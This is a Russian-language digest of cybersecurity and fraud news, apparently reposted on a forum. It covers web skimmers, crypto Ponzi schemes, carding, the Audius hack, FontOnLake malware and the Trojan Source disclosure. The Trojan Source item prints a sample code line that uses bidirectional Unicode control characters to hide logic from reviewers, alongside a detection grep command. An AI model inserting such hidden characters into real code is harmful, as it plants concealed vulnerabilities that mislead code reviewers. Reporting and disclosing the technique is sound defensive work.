Как сообщила Visa изданию «РИА Новости», исследователи выявили не менее 45 подобных кампаний за весь 2020 год. То же самое развитие наблюдалось и в 2021-м. В Visa подчеркнули роль мессенджера Telegram, который преступники часто используют для управления атаками.
Директор департамента проектирования компании «Газинформсервис» Александр Калита рассказал о новой хакерской тенденции:
«Количество успешных интернет-магазинов и торговых площадок с уязвимостями ограничено и имеет конечное число. Злоумышленники для увеличения своей прибыли стараются охватить как можно больший объем таких торговых площадок. Причем количество уязвимых веб-приложений и веб-сайтов со временем уменьшается, так что ничего удивительного, что сейчас дошло до того, что разные хакерские группы стали пересекаться друг с другом в захвате таких точек интереса. Для рядовых пользователей сети Интернет, это никак не снижает опасность и степень риска. Владельцам торговых площадок можно только порекомендовать выполнить ревизию кода веб-приложения и провести тестирование сайта на проникновение, для устранения угроз со стороны злоумышленников.
Что касается приложения Telegram, то оно обладает богатыми возможностями в части сопряжения Telegram-канала и внешних программ. Это позволяет автоматизировать множество действий, а самое главное добиться полной анонимности. Тут главное понимать, что Telegram — просто инструмент и проблема кроется не в нём, а в людях, которые совершают противоправные действия».
Напомним, что в этом месяце более чем в 300 онлайн-магазинах эксперты нашли веб-скиммер, спрятанный в GTM-контейнер. Оказалось, что атакующие создали собственный контейнер GTM с вредоносным содержимым и незаметно загружали его на взломанный сайт.
Исследователи из Кембриджского университета [опубликовали](https://www.lightbluetouchpaper.org/2021/11/01/trojan-source- invisible-vulnerabilities/) [технику](https://trojansource.codes/trojan- source.pdf) незаметной подстановки вредоносного кода в рецензируемые исходные тексты. Подготовленный метод атаки ([CVE-2021-42574](https://security- tracker.debian.org/tracker/CVE-2021-42574)) представлен под именем Trojan Source и базируется на формировании текста по разному выглядящего для компилятора/интерпретатора и человека, просматривающего код. Примеры применения метода продемонстрированы для различных компиляторов и интерпретаторов, поставляемых для языков C, C++ (gcc и clang), C#, JavaScript (Node.js), Java (OpenJDK 16), Rust, Go и Python.
Метод основан на применении в комментариях к коду специальных Unicode- символов, меняющих порядок отображения двунаправленного текста. При помощи подобных управляющих символов одни части текста могут выводиться слева- направо, а другие - справа-налево. В повседневной практике подобные управляющие символы могут применяться, например, для вставки в файл с кодом строк на иврите или арабском языке. Но если комбинировать строки с разным направлением текста в одной строке, при помощи указанных символов, отрывки текста, отображаемые справа-налево, могут перекрыть уже имеющийся обычный текст, отображаемый слева-направо.
Используя данный метод в код можно добавить вредоносную конструкцию, но затем сделать текст с этой конструкцией незаметным при просмотре кода, через добавление в следом идущем комментарии или внутри литерала символов, показываемых справа-налево, что приведёт к наложению на вредоносную вставку совершенно других символов. Подобный код останется семантически корректным, но будет различно интерпретироваться и отображаться.
В процессе рецензирования кода разработчик столкнётся с визуальным порядком вывода символов и увидит в современном текстовом редакторе, web-интерфейсе или IDE не вызывающий подозрения комментарий, но компилятор и интерпретатор будут использовать логический порядок символов и обработают вредоносную вставку как есть, не обращая внимание на двунаправленный текст в комментарии. Проблеме подвержены различные популярные редакторы кода (VS Code, Emacs, Atom), а также интерфейсы для просмотра кода в репозиториях (GitHub, Gitlab, BitBucket и все продукты Atlassian).
Выделяются несколько способов использования метода для реализации вредоносных действий: добавление скрытого выражения "return", приводящего к завершению выполнения функции раньше времени; заключение в комментарий выражений, нормальным образом видимых как действующие конструкции (например, для отключения важных проверок); присвоение иных строковых значений, приводящих к сбоям проверки строк.
Например, атакующий [может предложить](https://www.openwall.com/lists/oss- security/2021/11/01/1) изменение, включающее строку:
Code:Copy to clipboard
if access_level != "user{U+202E} {U+2066}// Check if admin{U+2069} {U+2066}" {
которая будет отображена в интерфейсе для рецензирования как
Code:Copy to clipboard
if access_level != "user" { // Check if admin
Дополнительно предложен ещё один вариант атаки (CVE-2021-42694), связанный с использованием омоглифов, символов, внешне похожих по начертанию, но отличающихся значением и имеющих разные unicode-коды (например, символ "ɑ" напоминает "a", "ɡ" - "g", "ɩ" - "l"). Подобные символы можно использовать в некоторых языках в именах функций и переменных для введения разработчиков в заблуждение. Например, могут быть определены две функции с неотличимыми именами, выполняющие разные действия. Без детального разбора сразу не понять, какая из этих двух функций вызывается в конкретном месте.
В качестве меры для защиты рекомендуется реализовать в компиляторах, интерпретаторах и сборочных инструментах, поддерживающих Unicode-символы, вывод ошибки или предупреждения при наличии в комментариях, строковых литералах или идентификаторах непарных управляющих символов, меняющих направление вывода (U+202A, U+202B, U+202C, U+202D, U+202E, U+2066, U+2067, U+2068, U+2069, U+061C, U+200E и U+200F). Подобные символы также должны быть явно запрещены в спецификациях языков программирования и должны учитываться в редакторах кода и интерфейсах для работы с репозиториями.
Дополнение: Исправления с устранением уязвимости подготовлены для GCC, LLVM/Clang, Rust, Python и binutils. Проблему также устранили GitHub, Bitbucket и Jira. В процессе подготовки исправление для GitLab. Для выявления проблемного кода предложено использовать команду:
Code:Copy to clipboard
grep -r $'[\u061C\u200E\u200F\u202A\u202B\u202C\u202D\u202E\u2066\u2067\u2068\u2069]' /path/to/source
Разработчики проекта MidnightBSD, развивающего десктоп-ориентированную операционную систему на основе FreeBSD с элементами, портированными из DragonFly BSD, OpenBSD и NetBSD, предупредили пользователей о выявлении следов взлома одного из серверов. Взлом был совершён через [эксплуатацию](https://github.com/httpvoid/writeups/blob/main/Confluence- RCE.md) обнаруженной в конце августа уязвимости [CVE-2021-26084](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2021-26084) в проприетарном движке для организации совместной работы Confluence (компания Atlassian предоставляла возможность бесплатного использования данного продукта для некоммерческих и открытых проектов).
На сервере также выполнялась СУБД проекта и размещалось хранилище файлов, используемое в том числе для промежуточного хранения новых версий пакетов перед публикацией на первичном FTP-сервере. По предварительным данным основной репозиторий пакетов и доступные для загрузки iso-образы не скомпрометированы.
Судя по всему, атака не была целевой и проект MidnightBSD стал одной из жертв [массовых](https://confluence.atlassian.com/doc/confluence-security- advisory-2021-08-25-1077906215.html) взломов серверов с уязвимыми версиями Confluence, после атаки на которые устанавливалось вредоносное ПО, нацеленное на майнинг криптовалюты. В настоящее время программная начинка взломанного сервера переустановлена с нуля и 90% отключённых после взлома сервисов возвращены в строй. Готовящийся к выпуску релиз MidnightBSD 2.1 решено отложить.
29-летний "мститель" удалил все данные из компьютерных систем средней школы в Великобритании и изменил пароли сотрудников IT-компании, а все потому, что его уволили. В результате действий экс-сотрудника школьники не могли обучаться на дому во время пандемии коронавируса.
Как сообщает Bleeping Computer, 16 января нынешнего года Адам Джорджсон (Adam Georgeson) загрузил и удалил данные из компьютеров школы Welland Park Academy в Маркет-Харборо в английском графстве Лестершир, где он работал IT- специалистом и откуда был уволен.
21 января, уже будучи сотрудником IT-компании в другом графстве, мужчина был арестован за свои действия в отношении школы. Однако на новом месте работы Джорджсон также не удержался и был уволен в феврале. Как и в случае со школой, мужчина решил отомстить экс-работодателю.
9 марта компания обнаружила в своей сети неавторизованную активность. Джорджсон не только поменял пароли, в результате чего пользователи оказались отрезаны от сети, но и модифицировал систему телефонии, использующуюся для связи с клиентами.
Злоумышленник предстал в суде на этой неделе и признал себя виновным по двум обвинениям в хакерских атаках. Теперь ему грозит наказание в виде до 10 лет лишения свободы. Мера наказания мужчине будет объявлена 27 января 2022 года.
По словам Джорджсона, он проник в системы школы от нечего делать и из скуки стал стирать данные. Однако, когда мужчина понял, что его могут вычислить, решил прибегнуть к более вредоносным действиям.
__
криптовалюту ](https://www.securitylab.ru/news/525111.php)
Мошенники сняли шесть офисов и устроили там колл-центры, "выкачивавшие" деньги из иностранцев под видом инвестиций.
 www.securitylab.ru
Напомним, сеть действовала в течение семи лет. С помощью Avalanche злоумышленники в разных странах мира размещали и распространяли различные типы вредоносного программного обеспечения и незаконно завладевали денежными средствами потерпевших. Сейчас организатору может грозить до 12-ти лет лишения свободы.
Следователи Главного следственного управления Национальной полиции Украины при оперативном сопровождении сотрудников Департамента киберполиции Национальной полиции Украины и при процессуальном руководстве Офиса Генерального прокурора закончили досудебное расследование в уголовном производстве по подозрению причастности 37-летнего жителя Полтавы к деятельности межгосударственной преступной группы, которая создала киберсеть Avalanche.
В ходе досудебного расследования установлено, что в состав группы вошли граждане Украины, Грузии и Румынии. Avalanche охватывала сложную всемирную сеть серверов и была разработана с целью обеспечения лиц, совершавших преступления во всемирной сети Интернет, безопасной инфраструктурой доменов, через которую можно размещать и распространять различные типы вредоносного программного обеспечения, перенаправлять трафик, поступающий с зараженных компьютеров, и осуществлять махинации по отмыванию средств.
Полицейские установили, что с использованием сети Avalanche путем инфицирования компьютеров потерпевших вредоносным программным обеспечением, которое предоставляло доступ к распоряжению счетами компаний, злоумышленники завладели средствами субъектов хозяйственной деятельности, которые расположены на территории Соединенных Штатов Америки. Таким образом, действуя в преступном сговоре, злоумышленники присвоили 721 тысячу долларов США. Деньги, полученные преступным путем, в частности 334,5 тыс. долларов США, были легализованы на территории Украины путем проведения финансовых операций через системы интернет-расчетов, открытых на «подставных» лиц.
В ходе расследования уголовного производства и международного правового сотрудничества с привлечением представителей правоохранительных органов Украины, США, Германии, Румынии, Грузии и других стран деятельность сети Avalanche была ликвидирована в 2016 году. Тогда же задержали и организатора. В декабре 2016 года Октябрьским районным судом г. Полтавы было рассмотрено ходатайство представителя Генеральной прокуратуры Украины о его аресте. В избрании такой меры пресечения суд отказал, после чего подозреваемый скрылся. Позже он был объявлен в международный розыск.
В феврале 2018 года хакера, которого разыскивали правоохранители 30 стран мира, киберполиция задержала в Киеве.
В настоящее время досудебное расследование завершено. Материалы открыты другой стороне.
Житель Полтавы подозревается в совершении правонарушений, предусмотренных ч. 2 ст. 361 (несанкционированное вмешательство в работу электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей), ч. 4 ст. 190 (завладение чужим имуществом путем обмана, совершенном по предварительному сговору группой лиц, путем незаконных операций с использованием электронно- электронным путем. Ему может грозить до 12-ти лет лишения свободы.
• Source: [https://www.npu.gov.ua/news/kiberzl...a-shhodo-organizatora- kibermerezhi-Avalanche/](https://www.npu.gov.ua/news/kiberzlochini/slidchi- naczpolicziji-zavershili-dosudove-rozsliduvannya-shhodo-organizatora- kibermerezhi-Avalanche/)
Федеральная полиция Бразилии изъяла криптовалюту на сумму 150 млн бразильских реалов ($28,7 млн) в ходе операции «Kryptos», связанной с предполагаемой финансовой пирамидой. Об этом сообщает CNN Brazil.
Правоохранители арестовали пять человек. Помимо цифровых активов в распоряжении полиции оказалось $3,6 млн в наличных долларах США, 21 премиум- автомобиль и различные ювелирные изделия.
По данным следователей, организатором преступной схемы стал один из задержанных, Глэйдсон Акасио. Владелец консалтингового бизнеса в сфере цифровых активов в Рио-де-Жанейро предлагал клиентам доходность до 15% годовых. Ему инкриминируют вывод «миллиардов» реалов клиентских средств.
В июле Федеральная полиция Бразилии ликвидировала Bitcoin Banco Group, ущерб от действий которой для 7000 граждан превысил $300 млн. Ее лидера Клаудио Оливейра, известного как «Король биткоинов», арестовали.
Ранее бывший бразильский полузащитник «Манчестер Юнайтед» Андерсон (Андерсон Луис де Абреу Оливейра) стал фигурантом дела о краже и отмывании денег через криптовалюту.
• Source: [https://www.cnnbrasil.com.br/busine...ao-de-criptomoedas-da- historia-r-150-milhoes/](https://www.cnnbrasil.com.br/business/policia- federal-faz-maior-apreensao-de-criptomoedas-da-historia-r-150-milhoes/)
Прокуратура Южного округа Нью-Йорка предъявила обвинения Идину Далпуру за организацию многолетней схемы Понци с использованием цифровых активов, ущерб от которой оценили в $43 млн.
Подозреваемого арестовали 1 мая. В тот же день состоялось первое слушание по делу.
По данным следствия, Далпур управлял мошеннической схемой с 2020 года. Он предлагал инвесторам из США и других стран получить «огромную прибыль» вплоть до 42% годовых, вкладываясь в гостиничный бизнес Лас-Вегаса и торговлю криптовалютами.
«Обещания [задержанного] были миражом. Он использовал классическую модель пирамиды, выплачивая инвесторам предполагаемую прибыль деньгами других инвесторов. Вместо того, чтобы использовать средства, как было обещано, Далпур щедро тратил на себя», — добавил прокурор Дэмиан Уильямс.
Власти отметили, что обвиняемый проиграл в азартные игры около $1,7 млн из средств жертв, покрывал ими долги, а также оплачивал обучение своих детей в частной школе.
Далпур лгал инвесторам, когда они пытались вернуть свои деньги. Однажды он заявил, что средства его компании временно заморозил банк из-за «взлома серверов».
В ходе разговора с группой вкладчиков в ноябре 2023 года он, как утверждается, прямо признался мошенничестве, фабрикации документов и растрате денег.
«То, что у вас уже есть, у вас есть. Вы можете посадить меня в тюрьму прямо сейчас», — заявил тогда Далпур.
По предъявленным обвинениям мужчине грозит до 20 лет заключения.
sc: justice[.]gov/usao-sdny/pr/manhattan-man-charged-running-43-million-ponzi- scheme
Приезжая по адресам, которые указывали ему кураторы, и забирал налик у мамонтов по схеме «Ваш родственник попал в ДТП».
Себе же он оставлял либо рекордно 2,5 % с профита, либо фикс сумму, которую ему в переписке через мессенджер разрешали взять его наниматели.
При этом бизнесменн вину не признает, говорит работодатели о рисках не предупреждали, значит все законно.
По всем фактам возбуждены уголовные дела по ч. 2 и 3 ст. 159 УК РФ.
32-летний житель Ревды М. с двумя подельниками в течение почти трех лет систематически пользовались чужими банковскими картами, оплачивая свои покупки в интернете, пока до «хакеров» не добралась полиция. По данным следствия, организованная группа совершила 38 краж с банковских счетов (не исключено, что есть и «неучтенные» эпизоды). Недавно М. судили, а его компаньонов ждет суд в Первоуральске.
Как они это делали? Вот как способ совершения преступления описан в материалах дела.
«Используя скомпрометированные данные банковской карты Сбербанка на имя Ивановой, приобретенные у неустановленного лица, посредством моноблока Lenovo с установленным на нем прокси-сервером для подмены IP-адреса зашли на сайт интернет-магазина, где ввели данные, код безопасности, срок действия карты и заказали кроссовки и спортивный костюм, оплатив 17400 рублей».
Среди покупок «хакеров» — куча одежды и обуви, авиабилеты, полугодовая подписка на домашний кинотеатр Ivi…
М. полностью признал свою вину и согласился сотрудничать со следствием — помог изобличить своих подельников. Поэтому его дело было выделено в отдельное производство и рассматривалось отдельно. Также он добровольно возместил ущерб, причиненный преступлениями. Ранее не судим, работает, положительно характеризуется, раскаивается в содеянном.
С учетом смягчающих обстоятельств, Ревдинский городской суд приговорил М. к четырем годам лишения свободы условно (по году за каждый эпизод «по совокупности преступлений путем частичного сложения наказаний»).
• Source: <https://www.revda-info.ru/2023/11/17/ukral-dengi-s-38-bankovskih- kart/>
19 декабря 2023 года Алматинский районный суд приговорил к реальному сроку двух организаторов P2P-сделок, посчитав их участниками мошеннической схемы. Об этом сообщает юридическое агентство Cartesius.
Расследование в отношении подсудимых началось полтора года назад. Согласно материалам дела, двое граждан проводили проводили Р2Р-сделки за наличные, работая через контрагента. Впоследствии выяснилось, что часть средств поступила от пенсионерок, которые стали жертвами телефонных мошенников.
По словам юристов, организаторы обмена без ведома оказались вовлечены в схему «треугольник». Тем не менее правоохранители вменили им пособничество в совершении мошенничества и сговор со злоумышленниками.
Сторона защиты предоставила полную информацию по каждой сделке продажи криптовалюты: переписки с контрагентами, хеши транзакций в сети Tron, движение средств обменника на централизованные биржи, а также перемещения биткоинов, купленных телефонными мошенниками за счет обманутых потерпевших.
Тем не менее следствие и суд проигнорировали эту информацию, утверждают юристы Cartesius.
Согласно судебному заключению, переписка с контрагентами является «доказательством, что обвиняемые были лично знакомы с неустановленными лицами и имели совместный преступный умысел». Показания свидетелей о легальности обменных операций расценены как «опровергающие защитную позицию обвиняемых».
[](https://forklog.com/wp- content/uploads/305557a61c3a6a42fb3ea-1024x970.webp)
В результате суд приговорил фигурантов к шести годам и восьми месяцам лишения свободы. Подсудимые вину не признали — сторона защита подала апелляционную жалобу.
В мотеле американского города Ки-Ларго (штат Флорида) были задержаны три человека, у которых нашли целую россыпь кредиток, удостоверений личности, водительских прав и наркотиков. Как сообщает Miami News, в банду входили 42-летняя Кэти Кэмпбелл (Katie Campbell), 30-летний Майкл Харви (Michael Harvey) и 27-летний Джейкоб Маевски (Jacob Majewski).
Подозреваемым предъявлены многочисленные обвинения, связанные с их предполагаемой незаконной деятельностью. Среди них — преступное использование личной идентификационной информации, владение поддельными кредитными картами, кража, владение незаконными водительскими правами или удостоверениями личности, инструментами для взлома и хранение наркотиков.
Аресты были произведены после того, как в офис шерифа поступил звонок от одного из сотрудников судебной системы, который опознал в посетителе мотеля Sunset Cove Beach (это была Кэмпбелл) человека, нарушившего условия освобождения и находящего в розыске. При задержании троицы подозреваемых полицейские обнаружили украденную почту, а также поддельные чеки, более 100 кредиток на имена других людей, сканер карт, марихуану, галлюциногенные грибы и фентанил (крайне опасный синтетический опиоид, оказывающий схожий с героином эффект, но более мощный и потому чаще вызывающий летальную передозировку).
Кэмпбелл и Маевски были доставлены в тюрьму, а Харви направили в близлежащий госпиталь с симптомами передозировки наркотиками и сильного обезвоживания. Сейчас его жизни ничего не угрожает.
source: wsvn.com/news/local/florida/arrests-made-in-key-largo-motel-trio- found-with-stolen-credit-cards-and-drugs
Музыкальная платформа из-за взлома потеряла 18,5 млн. токенов AUDIO
Децентрализованная музыкальная платформа Audius была взломана на прошлой неделе, злоумышленник украл более 18 млн. токенов AUDIO на сумму около $6 млн. Audius — это децентрализованная стриминговая платформа в блокчейне Ethereum, где артисты могут зарабатывать токены AUDIO, делясь своей музыкой, а пользователи могут зарабатывать токены, курируя и прослушивая контент.
После инцидента платформа отреагировала в течение нескольких минут, заморозив несколько сервисов до момента исправления и предотвращения дальнейшей кражи токенов.
Согласно отчету Audius , хакер воспользовался ошибкой в code contracts (контракт кода), которая позволяла выполнять повторные вызовы функций инициализации предусловий. Это позволило злоумышленнику перевести 18,5 млн. токенов AUDIO из «казначейства сообщества» на свой кошелек, изменив динамику управления платформой.
Затем киберпреступник попытался выполнить 4 предложения по управлению, 3 из которых провалились, а одна была принята. Это позволило перевести весь пул сообщества Audius в кошелек злоумышленника.
По словам Audius, новые токены не «чеканились», и инцидент не повлиял на обращение токена. Все оставшиеся пользовательские средства теперь в безопасности в соответствии с платформой. К 25 июля токен AUDIO снова функционировал, но системы смарт-контрактов «Staking» и «Delegate Manager» не возобновили работу, поскольку исправления все еще не установлены.
Хакер обменял свои токены на Uniswap всего за $1,07 млн., потеряв 5/6 их стоимости, а затем пропустил их через криптовалютный миксер Tornado Cash, чтобы скрыть след украденных средств.
Контрактная система Audius прошла две углубленные оценки безопасности в 2020 и 2021 году двумя разными аудиторами, но ни один из них не обнаружил использованную уязвимость. Эти контракты были развернуты в октябре 2020 года, и с тех пор эта уязвимость существует в дикой природе.
source: blog.audius.co/article/audius-governance-takeover-post-mortem-7-23-22
Массированные DDoS-атаки проводятся против IT-инфраструктуры органов власти Крыма, сообщил «Крыминформу» гендиректор АО «Крымтехнологии» Александр Узбек.
Хакеры начали атаковать сайты и системы вечером 24 февраля, этот процесс продолжается и сейчас. IP-адреса, которые используют авторы атак, расположены в Северной и Южной Америке, Тайване и ряде других стран.
«Все атаки относятся к http-flood атакам, направленным на вывод из строя веб-ресурсов», – пояснил Узбек.
Click to expand...
Однако, по его словам, специалисты компании обеспечивают работоспособность ресурсов, злоумышленникам пока не удалось нарушить их работу.
В Банке России разрабатываются новые нормы для предотвращения таких видов мошенничества.
Специалисты прокуратуры и отделения Банка России по Тюменской области рассказали, какими методами будут бороться с кибермошенниками. Данные принципы были разработаны на первом заседании межведомственной рабочей группы по вопросам профилактики и противодействия преступлениям, совершаемым с использованием информационно-коммуникационных технологий, которое прошло в 2021 году.
Что будет делать группа
Основной задачей группы станет профилактика киберпреступлений, а также их раскрытие и пресечение. Заседания будут проводиться не реже одного раза в квартал.
Внимание эксперты уделят повышению финансовой грамотности населения, так как проведенный прокуратурой региона анализ показывает, что именно это становится причиной роста количества потерпевших.
- Специалисты также рассматривают возможность более оперативного взаимодействия между регионами и получения информации от сотовых операторов и банков правоохранительными органами, - сообщил секретарь рабочей группы, прокурор по надзору за уголовно-процессуальной и оперативно- разыскной деятельностью региональной прокуратуры Манолис Терсенов.
Click to expand...
Заместитель управляющего отделением Банка России по Тюменской области Сергей Четверухин рассказал изданию "Тюменская область сегодня", что в третьем квартале 2021 года количество операций, проведенных без согласия клиента в целом по России выросло на 40% по сравнению с тем же периодом прошлого года. Объем похищенных средств – на 20%. Только за третий квартал россияне отдали мошенникам 3,2 млрд рублей.
Виды мошенничества
Популярные виды мошенничества: звонки или сообщения от псевдо-сотрудников банков о блокировке или списании средств с карты, оформлении кредита на имя жертвы и последующем переводе средств на безопасный счет, звонки от «псевдоброкеров» с предложением инвестиций на электронных торговых площадках, звонки от «сотрудников» силовых структур и т.д. Издание «Тюменская область сегодня» уже рассказывало о [некоторых схемах более подробно ранее.](https://tumentoday.ru/2022/01/03/v-2021-godu-tyumency-pereveli- kibermoshennikam-bolee-425-millionov-rublej/)
- Большинство методов, которые сегодня используют мошенники, не требуют от них особых технических навыков. Чаще всего они делают ставку на знание человеческой психологии – запугивают жертву или обещают ей быстрые деньги, не давая возможности трезво оценить ситуацию. По данным Банка России, 64% хищений со счетов граждан совершено с помощью обмана или методов социальной инженерии – клиентов убеждали самостоятельно перевести деньги на счета мошенников. Телефонный звонок – это самый массовый инструмент социальных инженеров, - рассказал Сергей Четверухин.
Click to expand...
Так обводить людей вокруг пальца мошенникам «помогает» наличие в доступе персональных данных и экстренность ситуации. Обычно преступники заставляют жертву срочно принять решение, чтобы «спасти» свои денежные средства или помочь следствию. В итоге им сообщают контрольные слова, коды подтверждения и другую важную информацию.
Новые методы борьбы
Для противодействия мошенникам в российской банковской системе готовят несколько нововведений. Во-первых, предполагается, что каждую операцию будут проверять на признаки мошенничества не только банк плательщика, как это происходит сейчас, но и банк получателя платежа. Если подозрительный счет есть в базе данных, банк получателя платежа сможет ограничивать дистанционный доступ к нему. Это означает, что его владельцу для получения денег нужно будет прийти в офис с паспортом. При этом его гражданские права не будут нарушены.
- Это не позволит воспользоваться деньгами дропперам - лицам, использующим чужие счета для вывода и снятия похищенных денег. Очевидно, что обращаться в банк по счету другого лица, карту которого эксплуатируют в противоправных целях, они не станут, - добавляет Четверухин.
Click to expand...
Второе нововведение касается возвращения потерпевшему утраченных средств. Сейчас деньги могут вернуть лишь, если клиент сам не передал мошенникам данные карты. В 3-ем квартале по этой причине россиянам вернули лишь 8% похищенных денег.
В настоящее время обсуждается вариант, когда клиент сможет вернуть всю утраченную сумму, если банк не учел информацию из базы данных о подозрительных счетах. Но для этого необходимо будет внести изменения в закон «О национальной платежной системе».
- Следующее заседание группы по борьбе с киберпреступлениями состоится в марте 2022 года. В планах прокуратуры обсудить использование для оперативной работы специальное программное обеспечение для сбора, систематизации, обработки и анализа сведений, о преступлениях, совершенных с использованием ИКТ, - сообщили в региональной прокуратуре.
Click to expand...
Напомним, что группу создали по инициативе прокурора региона Владислава Московских. В ее состав входят представители региональных УМВД, Следственного управления СК, УФСИН, правительства, Уральского управления Банка России и управления Роскомнадзора.
Одна из хакерских группировок отчиталась о вмешательстве в работу серверов Беларусской железной дороги. Они утверждают, что зашифровали большую часть информации, хранящейся на серверах, и уничтожили резервные копии.
Хакеры объяснили свои действия тем, что таким образом замедляют и нарушают
работу железной дороги, по которой сейчас перемещаются российские войска.
Сообщается при этом, что автоматика и системы безопасности не были затронуты
атакой. Хакеры обещают опубликовать ключи шифрования в обмен на «освобождение
50 политзаключенных и остановку группировки войск РФ на территории Беларуси».
Напомним, что в пресс-службе Беларусской железной дороги заявили о том, что
сервис оформления проездных документов онлайн по техническим причинам временно
недоступен.
Хакеры атаковали более десятка популярных каналов на видеосервисе YouTube. После получения доступа к аккаунту они размещали от имени канала видео с «раздачей криптовалют».
В видео мошенники призывали перечислять криптоактивы на указанный адрес в сети Binance Smart Chain, обещая, что удвоят любое количество монет. Криптовалютный аналитик CryptoWhale сообщил в Twitter, что под удар хакеров попали каналы «BitBoy Crypto», «Altcoin Buzz», «Box Mining», «Floyd Mayweather», «Ivan on Tech» и другие.
Однако, похоже, криптовалютное сообщество привыкло к таким мошенничествам и денег лишились немногие. Всего на кошелек злоумышленников поступило чуть более 2 BNB и менее $200 в различных токенах и стейблкоинах. Мошенники вывели BNB на другой адрес, а токены пока остаются на кошельке.
«К счастью, мы увидели мошенническое видео на нашем канале и удалили его в течение 2 минут после появления. Но даже за это время его успели посмотреть и прокомментировать некоторые пользователи», – рассказал владелец канала «Boxmining» Майкл Гу (Michael Gu).
Он подчеркнул, что при проверке не было найдено следов взлома его компьютера или каких-либо вирусов. Гу предположил, что ответственность за взлом должен взять на себя сервис YouTube, так как у него подключена функция двухфакторной аутентификации. Кроме того, в журнале действий Гу не увидел записей входа в аккаунт со сторонних IP-адресов.
Один из пользователей форума Reddit под псевдонимом 9Oh8m8 предположил, что хакеры могли воспользоваться методом подмены SIM-карт, что позволило обойти систему двухфакторной аутентификации. Осенью прошлого года компания Google [заявила](https://bits.media/otchet-google-russkoyazychnye-khakery- vzlamyvayut-kanaly-na-youtube-dlya-kriptomoshenichestva/), что русскоязычные хакеры взламывают аккаунты на сервисе YouTube с помощью фишинговых писем.
Вирус для Android атаковал 105 миллионов смартфонов
Специалисты по безопасности рассказали о вирусе Dark Herring, который атаковал пользователей смартфонов на Android. Об этом сообщает издание bleepingcomputer[.]
Эксперты Zimperium zLabs сообщили, что десятки миллионов пользователей Android-смартфонов были атакованы вирусом Dark Herring. Опасная программа незаметно для пользователя оформляла подписки на различные сервисы. По оценке специалистов, мошенники подписывали жертв на премиум-сервисы стоимостью около 15 долларов в месяц.
Dark Herring присутствовал примерно в 470 приложениях, доступных в магазине Google Play. В общей сложности вирус был обнаружен на смартфонах 105 миллионов пользователей в 70 странах. Уточняется, что так как оформление подписки и списание средств происходило в фоновом режиме, жертвы замечали потерю средств спустя несколько недель или месяцев после совершения атаки.
Аналитики Zimperium zLabs раскрыли сложную инфраструктуру, благодаря которой хакеры получали сведения от всех пользователей 470 приложений. Информация о взломанном смартфоне обрабатывалась отдельно с помощью уникального идентификатора. Среди приложений, в которых обнаружили вирус Dark Herring, оказались Smashex, Upgradem, Stream HD, Vidly Vibe и другие популярные программы, имеющие миллионы установок.
Okko совместно с изданием N+1 выпустят документальный сериал «Ничего личного», пишет пресс-служба сервиса. Он будет состоять из девяти эпизодов по 20 минут и будет доступен с 27 октября. Сериал «Ничего личного» повествует о персональных данных и о том «почему любой, кто хоть раз пользовался интернет-сервисами и приложениями, уже отдал всю свою личную информацию всем желающим». Девять серий посвящены теневому рынку данных, «цифровому сексу», интернет-травле и другим сторонам жизни человека в сети. Рассказчиком в проекте стал издатель N+1 Андрей Коняев, к которому присоединятся эксперты: хакеры, маркетологи, юристы, интернет-предприниматели и журналисты. По словам Коняева, он давно хотел сделать документальный сериал о цифровом измерении, которое люди «недооценивают и не до конца понимают, насколько оно влияет на нас, управляет нами».
Источник https://adindex.ru/news/media/2021/10/25/299502.phtml
Специалисты ESET рассказали о малвари FontOnLake, которая сочетает в себе компоненты бэкдора и руткита. Известно, что вредонос используется в направленных атаках против организаций в Юго-Восточной Азии.
Эксперты пишут, что первый файл, относящийся к этому семейству малвари, появился на VirusTotal еще в мае прошлого года, а другие образцы были загружены в течение года. Исходя из того, откуда были загружены эти файлы, исследователи сделали вывод, что FontOnLake применялся преимущественно в Юго- Восточной Азии. На момент написания отчета все управляющие серверы вредоноса уже были отключены. Но исследователи отмечают, что, как правило, во время таргетированных атак хакеры действуют именно таким образом: работа инфраструктуры прекращается, как только их цели будут достигнуты.
Известно, что FontOnLake распространяется через троянизированные приложения, однако исследователям неизвестно, как злоумышленники вынуждали свои жертв загрузить модифицированных бинарники. Среди утилит, которые злоумышленник изменили для доставки FontOnLake, были обнаружены: cat, kill, sftp и shd. По мнению исследователей, троянизированные утилиты, вероятно, были модифицированы на уровне исходного кода, то есть злоумышленники скомпилировали их и подменили оригинал.
«Все троянизированные файлы представляют собой стандартные утилиты Linux и нужны для сохранения присутствия в системе, потому как они обычно запускаются при старте системы», — пишут эксперты.
Также модифицированные бинарники обеспечивали загрузку дополнительных пейлоадов, сбор информации и выполнение других вредоносных действий. Дело в том, что FontOnLake имеет несколько модулей, которые взаимодействуют друг с другом и позволяют хакерам похищать конфиденциальные данные, эффективно скрывая свое присутствие в системе.
Также эксперты обнаружили три кастомных бэкдора, написанные на C ++ и связанные с FontOnLake. Они предоставляют операторам малвари удаленный доступ к зараженной системе. Общей функцией для всех бэкдоров является передача собранных учетных данных sshd и истории команд bash на управляющий сервер.
Присутствие FontOnLake в скомпрометированной системе также маскируется руткитом, который еще отвечает за обновления и доставку резервных бэкдоров. Все образцы руткитов, изученные ESET, нацеливались на версии ядра 2.6.32-696.el6.x86_64 и 3.10.0-229.el7.X86_64.
ESET отмечает, что, скорее всего, FontOnLake — это та же самая малварь, которую ранее анализировали эксперты Tencent Security Response Center. Также этого вредоноса, похоже, уже обнаруживали специалисты Avast и Lacework, в отчетах которых он фигурировал как руткит HCRootkit и Sutersu.
• Source: <https://www.welivesecurity.com/wp- content/uploads/2021/10/eset_fontonlake.pdf>
Исследователи из Университета Бирмингема и Университета Суррея в Великобритании обнаружили способ совершать мошеннические платежи с помощью Apple Pay с заблокированного iPhone с картой Visa. Метод представляет собой цифровую версию карманной кражи. Он работает по воздуху, даже если iPhone находится в сумке или в чьем-то кармане.
Специалисты изучали ретрансляционные атаки на бесконтактные платежи и обнаружили, что устройства iPhone подтверждают транзакции при определенных условиях. Для проведения платежа пользователям iPhone необходимо авторизовать его, разблокировав телефон с помощью Face ID, Touch ID или пароля. Однако в некоторых случаях, например при оплате проезда в общественном транспорте, разблокировка устройства делает процесс оплаты обременительным для пользователя. Apple Pay решила проблему с помощью функции Express Transit, позволяющей совершать транзакцию без разблокировки устройства.
